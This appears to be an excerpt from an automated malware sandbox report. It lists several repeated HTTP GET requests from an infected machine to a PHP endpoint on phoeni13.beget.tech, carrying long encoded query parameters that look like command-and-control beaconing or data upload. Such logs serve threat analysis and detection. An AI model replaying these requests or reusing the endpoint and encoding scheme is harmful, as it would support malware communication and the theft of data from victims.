/Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWWU5kNjRkT20ERNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFROxmU65ENNpXT6FkaO1mTy00dRRUTzkEVN1mQql0cJNlS3lUaPlWUt5ENZdUTppFVNlmRXlFeVdVT1UlaZpmVX5UeVd0T3FEVNJTV65kaWdUToJFVZVTStlVbapWSzl0UKVzaqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBz